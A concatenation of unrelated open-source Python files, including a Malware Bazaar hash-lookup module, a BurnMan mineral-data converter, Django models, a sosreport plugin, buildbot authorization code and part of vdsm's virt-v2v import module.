if (POE.logging == True):
newlogentry = 'Module: malware_bazaar_search'
LOG.WriteStrongLog(POE.logdir, POE.targetfilename, newlogentry)
if (POE.SHA256 == ''):
print (colored('\r\n[x] Unable to execute Malware Bazaar Search - hash value must be SHA256.', 'red', attrs=['bold']))
newlogentry = 'Unable to execute Malware Bazaar Search - hash value must be SHA256'
LOG.WriteStrongSubLog(POE.logdir, POE.targetfilename, newlogentry)
return -1
global json
query_status = ''
first_seen = ''
last_seen = ''
signature = ''
sig_count = 0
output = POE.logdir + 'MalwareBazaarSearch.json'
FI = fileio()
print (colored('\r\n[*] Running abuse.ch Malware Bazaar Search against: ' + POE.target, 'white', attrs=['bold']))
malwarebazaar = "https://mb-api.abuse.ch/api/v1/" #API URL
data = { #Our header params
'query': 'get_info',
'hash': POE.SHA256,
}
response_dump = requests.post(malwarebazaar, data=data, timeout=15) # Give us the results as JSON
if (POE.debug == True):
print (response_dump)
try:
FI.WriteLogFile(output, response_dump.content.decode("utf-8", "ignore"))
print (colored('[*] Malware Bazaar data had been written to file here: ', 'green') + colored(output, 'blue', attrs=['bold']))
if ((POE.logging == True) and (POE.nolinksummary == False)):
newlogentry = 'Malware Bazaar data has been generated to file here: <a href=\"' + output + '\"> Malware Bazaar Host Output </a>'
LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
except:
print (colored('[x] Unable to write Malware Bazaar data to file', 'red', attrs=['bold']))
if (POE.logging == True):
newlogentry = 'Unable to write Malware Bazaar data to file'
LOG.WriteStrongSubLog(POE.logdir, POE.targetfilename, newlogentry)
POE.csv_line += 'N/A,'
return -1
try:
#Open the file we just downloaded
print ('[-] Reading Malware Bazaar file: ' + output.strip())
with open(output.strip(), 'rb') as read_file:
data = json.load(read_file, cls=None)
read_file.close()
# Check what kind of results we have
query_status = data["query_status"]
print ('[*] query_status: ' + query_status)
if (query_status == 'ok'):
with open(output.strip(), 'r') as read_file:
for string in read_file:
if (POE.debug == True):
print ('[DEBUG] string: ' + string.strip())
if ('first_seen' in string):
first_seen = string.strip()
if ('last_seen' in string):
last_seen = string.strip()
if (('signature' in string) and (sig_count == 0)):
signature = string.strip()
sig_count += 1
print ('[*] Sample ' + first_seen.replace(',',''))
print ('[*] Sample ' + last_seen.replace(',',''))
print ('[*] Sample ' + signature.replace(',',''))
if (POE.logging == True):
newlogentry = 'Sample ' + first_seen.replace(',','')
LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
newlogentry = 'Sample ' + last_seen.replace(',','')
LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
newlogentry = 'Sample ' + signature.replace(',','')
LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
#Can't find anything on this one...
elif (query_status == 'hash_not_found'):
print (colored('[-] The hash value has not been found...', 'yellow', attrs=['bold']))
if (POE.logging == True):
newlogentry = 'No results available for host...'
LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
#Can't find anything on this one...
elif (query_status == 'no_results'):
print (colored('[-] No results available for host...', 'yellow', attrs=['bold']))
if (POE.logging == True):
newlogentry = 'No results available for host...'
LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
#Something weird happened...
else:
print (colored('[x] An error has occurred...', 'red', attrs=['bold']))
if (POE.logging == True):
newlogentry = 'An error has occurred...'
LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
except Exception as e:
print (colored('[x] Error: ' + str(e) + ' Terminating...', 'red', attrs=['bold']))
read_file.close()
return -1
#Clean up before returning
read_file.close()
return 0
|
QuLogic/burnman
|
burnman/data/input_raw_endmember_datasets/HHPH2013data_to_burnman.py
|
# BurnMan - a lower mantle toolkit
# Copyright (C) 2012-2014, Myhill, R., Heister, T., Unterborn, C., Rose, I. and Cottaar, S.
# Released under GPL v2 or later.
# This is a standalone program that converts a tabulated version of the Stixrude and Lithgow-Bertelloni data format into the standard burnman format (printed to stdout)
import sys
def read_dataset(datafile):
f=open(datafile,'r')
ds=[]
for line in f:
ds.append(line.decode('utf-8').split())
return ds
ds=read_dataset('HHPH2013_endmembers.dat')
print '# BurnMan - a lower mantle toolkit'
print '# Copyright (C) 2012, 2013, Heister, T., Unterborn, C., Rose, I. and Cottaar, S.'
print '# Released under GPL v2 or later.'
print ''
print '"""'
print 'HHPH_2013'
print 'Minerals from Holland et al 2013 and references therein'
print 'The values in this document are all in S.I. units,'
print 'unlike those in the original paper'
print 'File autogenerated using HHPHdata_to_burnman.py'
print '"""'
print ''
print 'from burnman.mineral import Mineral'
print 'from burnman.solidsolution import SolidSolution'
print 'from burnman.solutionmodel import *'
print 'from burnman.processchemistry import read_masses, dictionarize_formula, formula_mass'
print ''
print 'atomic_masses=read_masses()'
print ''
print '"""'
print 'ENDMEMBERS'
print '"""'
print ''
param_scales = [ -1., -1., #not nubmers, so we won't scale
1.e3, 1.e3, #kJ -> J
1.0, # J/K/mol
1.e-5, # kJ/kbar/mol -> m^3/mol
1.e3, 1.e-2, 1.e3, 1.e3, # kJ -> J and table conversion for b
1.e-5, # table conversion
1.e8, # kbar -> Pa
1.0, # no scale for K'0
1.e-8] #GPa -> Pa # no scale for eta_s
formula='0'
for idx, m in enumerate(ds):
if idx == 0:
param_names=m
else:
print 'class', m[0].lower(), '(Mineral):'
print ' def __init__(self):'
print ''.join([' formula=\'',m[1],'\''])
print ' formula = dictionarize_formula(formula)'
print ' self.params = {'
print ''.join([' \'name\': \'', m[0], '\','])
print ' \'formula\': formula,'
print ' \'equation_of_state\': \'hp_tmt\','
for pid, param in enumerate(m):
if pid > 1 and pid != 3 and pid<6:
print ' \''+param_names[pid]+'\':', float(param)*param_scales[pid], ','
print ' \'Cp\':', [round(float(m[i])*param_scales[i],10) for i in [6, 7, 8, 9]], ','
for pid, param in enumerate(m):
if pid > 9:
print ' \''+param_names[pid]+'\':', float(param)*param_scales[pid], ','
print ' \'n\': sum(formula.values()),'
print ' \'molar_mass\': formula_mass(formula, atomic_masses)}'
print ''
print ' self.uncertainties = {'
print ' \''+param_names[3]+'\':', float(m[3])*param_scales[3], '}'
print ' Mineral.__init__(self)'
print ''
|
LPgenerator/django-db-mailer
|
dbmail/providers/google/android.py
|
# -*- encoding: utf-8 -*-
try:
from httplib import HTTPSConnection
from urlparse import urlparse
except ImportError:
from http.client import HTTPSConnection
from urllib.parse import urlparse
from json import dumps, loads
from django.conf import settings
class GCMError(Exception):
pass
def send(user, message, **kwargs):
"""
Site: https://developers.google.com
API: https://developers.google.com/cloud-messaging/
Desc: Android notifications
"""
headers = {
"Content-type": "application/json",
"Authorization": "key=" + kwargs.pop("gcm_key", settings.GCM_KEY)
}
hook_url = 'https://android.googleapis.com/gcm/send'
data = {
"registration_ids": [user],
"data": {
"title": kwargs.pop("event"),
'message': message,
}
}
data['data'].update(kwargs)
up = urlparse(hook_url)
http = HTTPSConnection(up.netloc)
http.request(
"POST", up.path,
headers=headers,
body=dumps(data))
response = http.getresponse()
if response.status != 200:
raise GCMError(response.reason)
body = response.read()
if loads(body).get("failure") > 0:
raise GCMError(repr(body))
return True
|
ejspina/Gene_expression_tools
|
Python/FilterByID_dict_parse.py
|
#-------------------------------------------------------------------------------
# Name: module1
# Purpose:
#
# Author: Eli
#
# Created: 06/04/2014
# Copyright: (c) Eli 2014
# Licence: <your licence>
#-------------------------------------------------------------------------------
def main():
pass
if __name__ == '__main__':
main()
import sys
#This script filters a data file by id's listed one per line in another file
ids = open("C:/rnaseq/mirna_data/clusters/10rep_redo_deseq-edger/DEseq2_1cpm3redo_nopara2_logFCall.txt", "r")
#Take header from ID file & initialize empty dict
head_ids = ids.readline().strip("\n")
idlist1 = {}
#id_count = 0
#Make dict of ID's (key) & selected variables/annotations (values)
for line in ids:
name = line.strip('\n').split('\t')[0]
#name = name[4:]
#if len(name.split('-')) > 3:
# name = '-'.join(name.split('-')[1:])
#arm = name.split('-')[-1]
#name = '-'.join(['-'.join(name.split('-')[0:2]), arm])
name = name.strip('cin-')
#print name
#name = name[-5:]
#values = '\t'.join(line.strip('\n').split('\t')[1:3])
values = '\t'.join(line.strip('\n').split('\t')[1:4])
#if "ENSCINP" in values:
# values2 = values[7:]
# values = "ENSCINT" + values2
#values = '\t'.join(line.strip('\n').split('\t')[2:])
#values = values[0:-3]
if name in idlist1 and len(name) > 0:
if values in idlist1[name]:
continue
else:
idlist1[name].append(values)
elif len(name) > 0:
idlist1[name] = [values]
#id_count+=1
#if id_count%1000==0:
# print id_count
ids.close
#Debugging code below:
#print 'idlist1:', len(idlist1)
#sorted(idlist1)
#print idlist1
idlist1 = ['miR-216']
data = open("C:/rnaseq/coexpression/mirna-mrna/logfc_pearson/1cpm3_5rpkm3_redo2_edger_logfcValues_pearson_targetscan_deseq2logfc_mirs2.txt", "r")
#Output merged header & initialize retrieved list + row counter
#sys.stdout.write("LogFC.consensus" + '\t' + data.readline())
#sys.stdout.write("LogFC.consensus" + '\t' + '\t'.join(data.readline().split('\t')[0:3]) + '\n')
#sys.stdout.write(data.readline())
#data.readline()
matched = 0
idlist2 = {}
out = 0
#Match ID's between lists and return associated variables
for line in data:
#print line
name = line.strip('\n').split('\t')[6]
#print name
#name = name.split('|')[3].split('.')[0] # for first ID from BLAST target
#name = name[0:7]
#if name[-1].isalpha():
# name = name[0:-1]
#print name
#variables = line.strip('\n').split('\t')[5,9,10]
#idlist2[name] = line.split('\t')[1]
descr = line.strip('\n').split('\t')[1]
#if "," in descr:
# descr = descr.split(',')[0]
#name = line[1:20] # for trimmed encin gene name
#kh = '.'.join(line.split('\t')[1].split(':')[1].split('.')[0:4])
#Loop through input dict ID's and search for "name" in associated variables
#for item in idlist1: #Loop through keys (refseq)
if name in idlist1: #match primary ID's
#for item in idlist1[name].split(' '):
sys.stdout.write('\t'.join(idlist1[0]) + '\t' + line)
#EXCHANGE ID'S BUT KEEP REST OF LINE/DESCRIPTION
# sys.stdout.write(descr + '\t' + '\t'.join(idlist1[name]) + '\n')
#else:
# sys.stdout.write(descr + '\t' + name + '\n')
#print idlist1[name]
#sys.stdout.write(line.strip('\n') + '\t' + '\t'.join(idlist1[name]) + '\n')
#continue
#matched +=1
else:
sys.stdout.write(line)
#if name in idlist1[item]: #Check for each ID in the name variable
# idlist2[name] = variables
# values = idlist1[item]
# stop = 1
#while stop <= len(values):
# if descr in idlist1[name]:
# sys.stdout.write(line)
# out+=1
#print out
#Return items in matched list (idlist2) using associations from idlist1
#for mir in idlist1:
# if mir in idlist2:
# sys.stdout.write(mir + '\t' + '\t'.join(idlist2[mir]) + '\n')
# for mrna in idlist1[mir]:
# if mrna in idlist2:
# sys.stdout.write(mrna+ '\t' + '\t'.join(idlist2[mrna]) + '\n')
#if len(idlist1[name]) > 1:
# for value in idlist1[name]: #Print all values on separate lines
# sys.stdout.write(value + '\t' + line)
#sys.stdout.write(descr + '\t' + value + '\t' + name + '\t' + '\t'.join(variables) + '\n')
# sys.stdout.write(value + '\t' + '\t'.join(line.split('\t')[0:]))
#sys.stdout.write(value + '\t' + '\t'.join(line.split('\t')[0:3]) + '\n')
# out+=1
#else:
# sys.stdout.write('\t'.join(idlist1[name]) + '\t' + line)
#sys.stdout.write(descr + '\t' + ".\t".join(idlist1[name]) + '\t' + name + '\t' + '\t'.join(variables) + '\n')
#print idlist1[name]
# sys.stdout.write(('\t'.join(idlist1[name]) + '\t' + '\t'.join(line.split('\t')[0:])))
#sys.stdout.write(name + '\t' + '\t'.join(idlist1[name]) + '\t' + '\t'.join(line.split('\t')[2:]))
# out+=1
#print matched, out
#print gene
#print idlist1[item]
# sys.stdout.write(value + "\t" + name + '\t' + line)#'\t' + '\t'.join(line.split('\t')[2:]))
# stop+=1
#continue
#if name in idlist1:
# if descr in idlist1[name]:
# sys.stdout.write(line)
# descr = idlist1[name]
# sys.stdout.write('\t'.join(idlist1[name]) + '\t' + '\t'.join(line.split('\t')[2:]))
#sys.stdout.write('\t'.join(line.split('\t')[0:2]) + '\t' + descr + '\n')
#del idlist1[name]
#else:
# pass
#sys.stdout.write(line + '\n')
#if name in idlist2:
# pass
#else:
#idlist2.append(name)
#idlist1.remove(name)
#print line
#count+=1
#Code for checking remaining values in ID list
#for item in idlist1:
# print "bakow!"
# sys.stdout.write(item + '\t' + idlist2[item] + '\t' + idlist1[item] + '\n')
#else:
# print line.split('\t')[0]
#print len(idlist1), len(idlist2)
#print len(idlist1)-len(idlist2)
#print len(idlist1)
#sorted(idlist2)
#print idlist1
#for item in idlist2:
# if item in idlist1:
# idlist1.remove(item)
#print 'idlist1-idlist2', len(idlist1)
#for item in idlist1:
# print item
#cross check input and output lists
#idlist3= []
#for thing in idlist1:
# if thing in idlist2:
# pass
# else:
# idlist3.append(thing)
#print len(idlist3)
#print len(idlist4)
#idlist4 = [x for x in idlist1 if x not in idlist2]
|
underdogio/tld
|
src/tld/update.py
|
from __future__ import print_function
"""
Deprecated. Use ``update-tld-names`` command instead.
"""
__title__ = 'tld.update'
__author__ = 'Artur Barseghyan'
__copyright__ = '2013-2015 Artur Barseghyan'
__license__ = 'GPL 2.0/LGPL 2.1'
from tld.utils import update_tld_names
_ = lambda x: x
if __name__ == '__main__':
update_tld_names()
print(_("Local TLD names file has been successfully updated!"))
|
saloni10/librehatti_new
|
src/authentication/models.py
|
from django.db import models
from django.contrib.auth.models import User
class OrganisationType(models.Model):
type_desc = models.CharField(max_length=200)
def __unicode__(self):
return self.type_desc
class Address(models.Model):
street_address = models.CharField(max_length=100)
city = models.CharField(max_length=100)
pin = models.CharField(max_length=10)
province = models.CharField(max_length=100)
nationality = models.CharField(max_length=100)
def __unicode__(self):
return self.street_address + ',' + self.city
class HattiUser(models.Model):
user = models.OneToOneField(User)
address = models.ForeignKey(Address)
telephone = models.CharField(max_length=500)
date_joined = models.DateTimeField(auto_now_add=True)
fax = models.CharField(max_length=100)
avatar = models.CharField(max_length=100, null=True, blank=True)
tagline = models.CharField(max_length=140)
class Meta:
abstract = True
class AdminOrganisations(HattiUser):
title = models.CharField(max_length=200)
organisation_type = models.ForeignKey(OrganisationType)
def __unicode__(self):
return self.title
class Customer(HattiUser):
title = models.CharField(max_length=200, blank=True, null=True)
is_org = models.BooleanField();
org_type = models.ForeignKey(OrganisationType)
company = models.CharField(max_length = 200)
def __unicode__(self, arg):
return unicode(self.user)
|
portante/sosreport
|
sos/plugins/sysvipc.py
|
## Copyright (C) 2007-2012 Red Hat, Inc., Bryn M. Reeves <bmr@redhat.com>
### This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
from sos.plugins import Plugin, RedHatPlugin, DebianPlugin, UbuntuPlugin
class SysVIPC(Plugin, RedHatPlugin, DebianPlugin, UbuntuPlugin):
"""SysV IPC related information
"""
plugin_name = "sysvipc"
def setup(self):
self.add_copy_specs([
"/proc/sysvipc/msg",
"/proc/sysvipc/sem",
"/proc/sysvipc/shm"
])
self.add_cmd_output("ipcs")
# vim: et ts=4 sw=4
|
centrumholdings/buildbot
|
buildbot/status/web/authz.py
|
from buildbot.status.web.auth import IAuth
class Authz(object):
"""Decide who can do what."""
knownActions = [
# If you add a new action here, be sure to also update the documentation
# at docs/cfg-statustargets.texinfo
'gracefulShutdown',
'forceBuild',
'forceAllBuilds',
'pingBuilder',
'stopBuild',
'stopAllBuilds',
'cancelPendingBuild',
]
def __init__(self,
default_action=False,
auth=None,
**kwargs):
self.auth = auth
if auth:
assert IAuth.providedBy(auth)
self.config = dict( (a, default_action) for a in self.knownActions )
for act in self.knownActions:
if act in kwargs:
self.config[act] = kwargs[act]
del kwargs[act]
if kwargs:
raise ValueError("unknown authorization action(s) " + ", ".join(kwargs.keys()))
def advertiseAction(self, action):
"""Should the web interface even show the form for ACTION?"""
if action not in self.knownActions:
raise KeyError("unknown action")
cfg = self.config.get(action, False)
if cfg:
return True
return False
def needAuthForm(self, action):
"""Does this action require an authentication form?"""
if action not in self.knownActions:
raise KeyError("unknown action")
cfg = self.config.get(action, False)
if cfg == 'auth' or callable(cfg):
return True
return False
def actionAllowed(self, action, request, *args):
"""Is this ACTION allowed, given this http REQUEST?"""
if action not in self.knownActions:
raise KeyError("unknown action")
cfg = self.config.get(action, False)
if cfg:
if cfg == 'auth' or callable(cfg):
if not self.auth:
return False
user = request.args.get("username", ["<unknown>"])[0]
passwd = request.args.get("passwd", ["<no-password>"])[0]
if user == "<unknown>" or passwd == "<no-password>":
return False
if self.auth.authenticate(user, passwd):
if callable(cfg) and not cfg(user, *args):
return False
return True
return False
else:
return True # anyone can do this..
|
joshmoore/zeroc-ice
|
py/test/Ice/faultTolerance/Client.py
|
#!/usr/bin/env python
# **********************************************************************
#
# Copyright (c) 2003-2011 ZeroC, Inc. All rights reserved.
#
# This copy of Ice is licensed to you under the terms described in the
# ICE_LICENSE file included in this distribution.
#
# **********************************************************************
import os, sys, traceback
import Ice, AllTests
def test(b):
if not b:
raise RuntimeError('test assertion failed')
def usage(n):
sys.stderr.write("Usage: " + n + " port...\n")
def run(args, communicator):
ports = []
for arg in args[1:]:
if arg[0] == '-':
sys.stderr.write(args[0] + ": unknown option `" + arg + "'\n")
usage(args[0])
return False
ports.append(int(arg))
if len(ports) == 0:
sys.stderr.write(args[0] + ": no ports specified\n")
usage(args[0])
return False
try:
AllTests.allTests(communicator, ports)
except:
traceback.print_exc()
test(False)
return True
try:
initData = Ice.InitializationData()
initData.properties = Ice.createProperties(sys.argv)
#
# This test aborts servers, so we don't want warnings.
#
initData.properties.setProperty('Ice.Warn.Connections', '0')
communicator = Ice.initialize(sys.argv, initData)
status = run(sys.argv, communicator)
except:
traceback.print_exc()
status = False
if communicator:
try:
communicator.destroy()
except:
traceback.print_exc()
status = False
sys.exit(not status)
|
EdDev/vdsm
|
lib/vdsm/v2v.py
|
# Copyright 2014-2017 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Refer to the README and COPYING files for full details of the license
#
"""
When importing a VM a thread start with a new process of virt-v2v.
The way to feedback the information on the progress and the status of the
process (ie job) is via getVdsStats() with the fields progress and status.
progress is a number which represent percentage of a single disk copy,
status is a way to feedback information on the job (init, error etc)
"""
from __future__ import absolute_import
from collections import namedtuple
from contextlib import closing, contextmanager
import errno
import io
import logging
import os
import re
import subprocess
import tarfile
import time
import threading
import xml.etree.ElementTree as ET
import zipfile
import libvirt
from vdsm.cmdutils import wrap_command
from vdsm.commands import execCmd, BUFFSIZE
from vdsm.common import cmdutils
from vdsm.common.define import errCode, doneCode
from vdsm.common import response
from vdsm.common import zombiereaper
from vdsm.common.compat import CPopen
from vdsm.common.logutils import traceback
from vdsm.common.time import monotonic_time
from vdsm.constants import P_VDSM_LOG, P_VDSM_RUN, EXT_KVM_2_OVIRT
from vdsm import concurrent, libvirtconnection
from vdsm import password
from vdsm.utils import terminating, NICENESS, IOCLASS
try:
import ovirt_imageio_common
except ImportError:
ovirt_imageio_common = None
_lock = threading.Lock()
_jobs = {}
_V2V_DIR = os.path.join(P_VDSM_RUN, 'v2v')
_LOG_DIR = os.path.join(P_VDSM_LOG, 'import')
_VIRT_V2V = cmdutils.CommandPath('virt-v2v', '/usr/bin/virt-v2v')
_SSH_AGENT = cmdutils.CommandPath('ssh-agent', '/usr/bin/ssh-agent')
_SSH_ADD = cmdutils.CommandPath('ssh-add', '/usr/bin/ssh-add')
_XEN_SSH_PROTOCOL = 'xen+ssh'
_VMWARE_PROTOCOL = 'vpx'
_KVM_PROTOCOL = 'qemu'
_SSH_AUTH_RE = '(SSH_AUTH_SOCK)=([^;]+).*;\nSSH_AGENT_PID=(\d+)'
_OVF_RESOURCE_CPU = 3
_OVF_RESOURCE_MEMORY = 4
_OVF_RESOURCE_NETWORK = 10
_QCOW2_COMPAT_SUPPORTED = ('0.10', '1.1')
# OVF Specification:
# https://www.iso.org/obp/ui/#iso:std:iso-iec:17203:ed-1:v1:en
_OVF_NS = 'http://schemas.dmtf.org/ovf/envelope/1'
_RASD_NS = 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/' \
'CIM_ResourceAllocationSettingData'
ImportProgress = namedtuple('ImportProgress',
['current_disk', 'disk_count', 'description'])
DiskProgress = namedtuple('DiskProgress', ['progress'])
class STATUS:
'''
STARTING: request granted and starting the import process
COPYING_DISK: copying disk in progress
ABORTED: user initiated aborted
FAILED: error during import process
DONE: convert process successfully finished
'''
STARTING = 'starting'
COPYING_DISK = 'copying_disk'
ABORTED = 'aborted'
FAILED = 'error'
DONE = 'done'
class V2VError(Exception):
''' Base class for v2v errors '''
err_name = 'unexpected' # TODO: use more specific error
class ClientError(Exception):
''' Base class for client error '''
err_name = 'unexpected'
class InvalidVMConfiguration(ValueError):
''' Unexpected error while parsing libvirt domain xml '''
class OutputParserError(V2VError):
''' Error while parsing virt-v2v output '''
class JobExistsError(ClientError):
''' Job already exists in _jobs collection '''
err_name = 'JobExistsError'
class VolumeError(ClientError):
''' Error preparing volume '''
class NoSuchJob(ClientError):
''' Job not exists in _jobs collection '''
err_name = 'NoSuchJob'
class JobNotDone(ClientError):
''' Import process still in progress '''
err_name = 'JobNotDone'
class NoSuchOvf(V2VError):
''' Ovf path is not exists in /var/run/vdsm/v2v/ '''
err_name = 'V2VNoSuchOvf'
class V2VProcessError(V2VError):
''' virt-v2v process had error in execution '''
class InvalidInputError(ClientError):
''' Invalid input received '''
def get_external_vms(uri, username, password, vm_names=None):
if vm_names is not None:
if not vm_names:
vm_names = None
else:
vm_names = frozenset(vm_names)
try:
conn = libvirtconnection.open_connection(uri=uri,
username=username,
passwd=password)
except libvirt.libvirtError as e:
logging.exception('error connecting to hypervisor')
return {'status': {'code': errCode['V2VConnection']['status']['code'],
'message': str(e)}}
with closing(conn):
vms = []
for vm in _list_domains(conn):
if vm_names is not None and vm.name() not in vm_names:
# Skip this VM.
continue
elif conn.getType() == "ESX" and _vm_has_snapshot(vm):
logging.error("vm %r has snapshots and therefore can not be "
"imported since snapshot conversion is not "
"supported for VMware", vm.name())
continue
_add_vm(conn, vms, vm)
return {'status': doneCode, 'vmList': vms}
def get_external_vm_names(uri, username, password):
try:
conn = libvirtconnection.open_connection(uri=uri,
username=username,
passwd=password)
except libvirt.libvirtError as e:
logging.exception('error connecting to hypervisor')
return response.error('V2VConnection', str(e))
with closing(conn):
vms = [vm.name() for vm in _list_domains(conn)]
return response.success(vmNames=vms)
def convert_external_vm(uri, username, password, vminfo, job_id, irs):
if uri.startswith(_XEN_SSH_PROTOCOL):
command = XenCommand(uri, vminfo, job_id, irs)
elif uri.startswith(_VMWARE_PROTOCOL):
command = LibvirtCommand(uri, username, password, vminfo, job_id,
irs)
elif uri.startswith(_KVM_PROTOCOL):
if ovirt_imageio_common is None:
raise V2VError('Unsupported protocol KVM, ovirt_imageio_common'
'package is needed for importing KVM images')
command = KVMCommand(uri, username, password, vminfo, job_id, irs)
else:
raise ClientError('Unknown protocol for Libvirt uri: %s', uri)
job = ImportVm(job_id, command)
job.start()
_add_job(job_id, job)
return {'status': doneCode}
def convert_ova(ova_path, vminfo, job_id, irs):
command = OvaCommand(ova_path, vminfo, job_id, irs)
job = ImportVm(job_id, command)
job.start()
_add_job(job_id, job)
return response.success()
def get_ova_info(ova_path):
ns = {'ovf': _OVF_NS, 'rasd': _RASD_NS}
try:
root = ET.fromstring(_read_ovf_from_ova(ova_path))
except ET.ParseError as e:
raise V2VError('Error reading ovf from ova, position: %r' % e.position)
vm = {}
_add_general_ovf_info(vm, root, ns, ova_path)
_add_disks_ovf_info(vm, root, ns)
_add_networks_ovf_info(vm, root, ns)
return response.success(vmList=vm)
def get_converted_vm(job_id):
try:
job = _get_job(job_id)
_validate_job_done(job)
ovf = _read_ovf(job_id)
except ClientError as e:
logging.info('Converted VM error %s', e)
return errCode[e.err_name]
except V2VError as e:
logging.error('Converted VM error %s', e)
return errCode[e.err_name]
return {'status': doneCode, 'ovf': ovf}
def delete_job(job_id):
try:
job = _get_job(job_id)
_validate_job_finished(job)
_remove_job(job_id)
except ClientError as e:
logging.info('Cannot delete job, error: %s', e)
return errCode[e.err_name]
return {'status': doneCode}
def abort_job(job_id):
try:
job = _get_job(job_id)
job.abort()
except ClientError as e:
logging.info('Cannot abort job, error: %s', e)
return errCode[e.err_name]
return {'status': doneCode}
def get_jobs_status():
ret = {}
with _lock:
items = tuple(_jobs.items())
for job_id, job in items:
ret[job_id] = {
'status': job.status,
'description': job.description,
'progress': job.progress
}
return ret
def _add_job(job_id, job):
with _lock:
if job_id in _jobs:
raise JobExistsError("Job %r exists" % job_id)
_jobs[job_id] = job
def _get_job(job_id):
with _lock:
if job_id not in _jobs:
raise NoSuchJob("No such job %r" % job_id)
return _jobs[job_id]
def _remove_job(job_id):
with _lock:
if job_id not in _jobs:
raise NoSuchJob("No such job %r" % job_id)
del _jobs[job_id]
def _validate_job_done(job):
if job.status != STATUS.DONE:
raise JobNotDone("Job %r is %s" % (job.id, job.status))
def _validate_job_finished(job):
if job.status not in (STATUS.DONE, STATUS.FAILED, STATUS.ABORTED):
raise JobNotDone("Job %r is %s" % (job.id, job.status))
def _read_ovf(job_id):
file_name = os.path.join(_V2V_DIR, "%s.ovf" % job_id)
try:
with open(file_name, 'r') as f:
return f.read()
except IOError as e:
if e.errno != errno.ENOENT:
raise
raise NoSuchOvf("No such ovf %r" % file_name)
class SSHAgent(object):
"""
virt-v2v uses ssh-agent for importing xen vms from libvirt,
after virt-v2v log in to the machine it needs to copy its disks
which ssh-agent let it handle without passwords while the session
is on.
for more information please refer to the virt-v2v man page:
http://libguestfs.org/virt-v2v.1.html
"""
def __init__(self):
self._auth = None
self._agent_pid = None
self._ssh_auth_re = re.compile(_SSH_AUTH_RE)
def __enter__(self):
rc, out, err = execCmd([_SSH_AGENT.cmd], raw=True)
if rc != 0:
raise V2VError('Error init ssh-agent, exit code: %r'
', out: %r, err: %r' %
(rc, out, err))
m = self._ssh_auth_re.match(out)
# looking for: SSH_AUTH_SOCK=/tmp/ssh-VEE74ObhTWBT/agent.29917
self._auth = {m.group(1): m.group(2)}
self._agent_pid = m.group(3)
try:
rc, out, err = execCmd([_SSH_ADD.cmd], env=self._auth)
except:
self._kill_agent()
raise
if rc != 0:
# 1 = general fail
# 2 = no agnet
if rc != 2:
self._kill_agent()
raise V2VError('Error init ssh-add, exit code: %r'
', out: %r, err: %r' %
(rc, out, err))
def __exit__(self, *args):
rc, out, err = execCmd([_SSH_ADD.cmd, '-d'], env=self._auth)
if rc != 0:
logging.error('Error deleting ssh-add, exit code: %r'
', out: %r, err: %r' %
(rc, out, err))
self._kill_agent()
def _kill_agent(self):
rc, out, err = execCmd([_SSH_AGENT.cmd, '-k'],
env={'SSH_AGENT_PID': self._agent_pid})
if rc != 0:
logging.error('Error killing ssh-agent (PID=%r), exit code: %r'
', out: %r, err: %r' %
(self._agent_pid, rc, out, err))
@property
def auth(self):
return self._auth
class V2VCommand(object):
def __init__(self, vminfo, vmid, irs):
self._vminfo = vminfo
self._vmid = vmid
self._irs = irs
self._prepared_volumes = []
self._passwd_file = os.path.join(_V2V_DIR, "%s.tmp" % vmid)
self._password = password.ProtectedPassword('')
self._base_command = [_VIRT_V2V.cmd, '-v', '-x']
self._query_v2v_caps()
if 'qcow2_compat' in vminfo:
qcow2_compat = vminfo['qcow2_compat']
if qcow2_compat not in _QCOW2_COMPAT_SUPPORTED:
logging.error('Invalid QCOW2 compat version %r' %
qcow2_compat)
raise ValueError('Invalid QCOW2 compat version %r' %
qcow2_compat)
if 'vdsm-compat-option' in self._v2v_caps:
self._base_command.extend(['--vdsm-compat', qcow2_compat])
elif qcow2_compat != '0.10':
# Note: qcow2 is only a suggestion from the engine
# if virt-v2v doesn't support it we fall back to default
logging.info('virt-v2v not supporting qcow2 compat version: '
'%r', qcow2_compat)
def execute(self):
raise NotImplementedError("Subclass must implement this")
def _command(self):
raise NotImplementedError("Subclass must implement this")
def _start_helper(self):
timestamp = time.strftime('%Y%m%dT%H%M%S')
log = os.path.join(_LOG_DIR,
"import-%s-%s.log" % (self._vmid, timestamp))
logging.info("Storing import log at: %r", log)
v2v = _simple_exec_cmd(self._command(),
nice=NICENESS.HIGH,
ioclass=IOCLASS.IDLE,
env=self._environment(),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
tee = _simple_exec_cmd(['tee', log],
nice=NICENESS.HIGH,
ioclass=IOCLASS.IDLE,
stdin=v2v.stdout,
stdout=subprocess.PIPE)
return PipelineProc(v2v, tee)
def _get_disk_format(self):
fmt = self._vminfo.get('format', 'raw').lower()
return "qcow2" if fmt == "cow" else fmt
def _disk_parameters(self):
parameters = []
for disk in self._vminfo['disks']:
try:
parameters.append('--vdsm-image-uuid')
parameters.append(disk['imageID'])
parameters.append('--vdsm-vol-uuid')
parameters.append(disk['volumeID'])
except KeyError as e:
raise InvalidInputError('Job %r missing required property: %s'
% (self._vmid, e))
return parameters
@contextmanager
def _volumes(self):
